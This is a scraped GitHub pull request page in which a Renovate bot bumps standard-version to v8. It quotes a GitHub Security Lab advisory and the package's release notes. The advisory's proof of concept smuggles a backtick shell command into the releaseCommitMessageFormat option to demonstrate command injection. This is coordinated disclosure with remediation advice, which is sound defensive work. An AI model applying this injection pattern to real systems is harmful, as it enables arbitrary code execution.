Skip to content

chore(deps): update devdependency standard-version to v8 [security] #67

New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

chore(deps): update devdependency standard-version to v8 [security] #67

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Aug 6, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
standard-version ^4.4.0 -> ^8.0.0 age adoption passing confidence

GitHub Vulnerability Alerts

GHSA-7xcx-6wjh-7xp2

GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111

The GitHub Security Lab team has identified a potential security vulnerability in standard-version.

Summary

The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.

Product

Standard Version

Tested Version

Commit 2f04ac8

Details

Issue 1: Command injection in standardVersion

The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:

npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"

Now create a file with the following contents:

var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');

const standardVersion = require('standard-version')

standardVersion({
  noVerify: true,
  infile: 'foo.txt',
  releaseCommitMessageFormat: "bla `touch exploit`"
})

and run it:

node test.js

Notice that a file named exploit has been created.

This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples:
CVE-2020-7646,
CVE-2020-7614,
CVE-2020-7597,
CVE-2019-10778,
CVE-2019-10776,
CVE-2018-16462,
CVE-2018-16461,
CVE-2018-16460,
CVE-2018-13797,
CVE-2018-3786,
CVE-2018-3772,
CVE-2018-3746,
CVE-2017-16100,
CVE-2017-16042.

We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Remediation

We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.

Credit

This issue was discovered and reported by GitHub Engineer @​erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2020-111 in any communication regarding this issue.

Disclosure Policy

This report is subject to our coordinated disclosure policy.

Release Notes

conventional-changelog/standard-version (standard-version)

v8.0.1

Compare Source

v8.0.0

Compare Source

⚠ BREAKING CHANGES
  • composer.json and composer.lock will no longer be read from or bumped by default. If you need to obtain a version or write a version to these files, please use bumpFiles and/or packageFiles options accordingly.
Bug Fixes
  • composer.json and composer.lock have been removed from default package and bump files. (c934f3a), closes #​495 #​394
  • deps: update dependency conventional-changelog to v3.1.18 (#​510) (e6aeb77)
  • deps: update dependency yargs to v15.1.0 (#​518) (8f36f9e)
  • deps: update dependency yargs to v15.3.1 (#​559) (d98cd46)

v7.1.0

Compare Source

Features
  • Adds support for header (--header) configuration based on the spec. (#​364) (ba80a0c)
  • custom 'bumpFiles' and 'packageFiles' support (#​372) (564d948)
Bug Fixes
  • deps: update dependency conventional-changelog to v3.1.15 (#​479) (492e721)
  • deps: update dependency conventional-changelog-conventionalcommits to v4.2.3 (#​496) (bc606f8)
  • deps: update dependency conventional-recommended-bump to v6.0.5 (#​480) (1e1e215)
  • deps: update dependency yargs to v15 (#​484) (35b90c3)
  • use require.resolve for the default preset (#​465) (d557372)
  • deps: update dependency detect-newline to v3.1.0 (#​482) (04ab36a)
  • deps: update dependency figures to v3.1.0 (#​468) (63300a9)
  • deps: update dependency git-semver-tags to v3.0.1 (#​485) (9cc188c)
  • deps: update dependency yargs to v14.2.1 (#​483) (dc1fa61)
  • deps: update dependency yargs to v14.2.2 (#​488) (ecf26b6)
7.0.1 (2019-11-07)
Bug Fixes
  • deps: update dependency conventional-changelog to v3.1.12 (#​463) (f04161a)
  • deps: update dependency conventional-changelog-config-spec to v2.1.0 (#​442) (a2c5747)
  • deps: update dependency conventional-recommended-bump to v6.0.2 (#​462) (84bb581)
  • deps: update dependency stringify-package to v1.0.1 (#​459) (e06a835)
  • deps: update dependency yargs to v14 (#​440) (fe37e73)
  • deps: update dependency yargs to v14.2.0 (#​461) (fb21851)

v7.0.1

Compare Source

v7.0.0

Compare Source

⚠ BREAKING CHANGES
  • we were accepting .version.json as a config file, rather than .versionrc.json
Bug Fixes
  • bump: transmit tag prefix argument to conventionalRecommendedBump (#​393) (8205222)
  • cli: display only one, correct default for --preset flag (#​377) (d17fc81)
  • commit: don't try to process and add changelog if skipped (#​318) (3e4fdec)
  • deps: update dependency conventional-changelog-config-spec to v2 (#​352) (f586844)
  • deps: update dependency conventional-recommended-bump to v6 (#​417) (4c5cad1)
  • deps: update dependency find-up to v4 (#​355) (73b35f8)
  • deps: update dependency find-up to v4.1.0 (#​383) (b621a4a)
  • deps: update dependency git-semver-tags to v3 (#​418) (1ce3f4a)
  • deps: update dependency semver to v6.3.0 (#​366) (cd866c7)
  • deps: update dependency yargs to v13.3.0 (#​401) (3d0e8c7)
  • adds support for releaseCommitMessageFormat (#​351) (a7133cc)
  • stop suggesting npm publish if package.json was not updated (#​319) (a5ac845)
  • Updates package.json to actual supported (tested) NodeJS versions. (#​379) (15eec8a)
  • deps: update dependency yargs to v13.2.4 (#​356) (00b2ce6)
  • update config file name in command based on README.md (#​357) (ce44dd2)
6.0.1 (2019-05-05)
Bug Fixes
  • don't pass args to git rev-parse (1ac72f7)

v6.0.1

Compare Source

v6.0.0

Compare Source

Bug Fixes
Build System
Features
Tests
BREAKING CHANGES
  • we now bump the minor rather than major if version < 1.0.0; --release-as can be used to bump to 1.0.0.
  • tests are no longer run for Node 6
  • we now use the conventionalcommits preset by default, which directly tracks conventionalcommits.org.

v5.0.2

Compare Source

v5.0.1

Compare Source

Bug Fixes
  • make pattern for finding CHANGELOG sections work for non anchors (#​292) (b684c78)

v5.0.0

Compare Source

Bug Fixes
chore
Features
BREAKING CHANGES
  • if no package.json, bower.json, etc., is found, we now fallback to git tags
  • removed Node 4/5 from testing matrix

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

# for free to join this conversation on GitHub. Already have an account? # to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants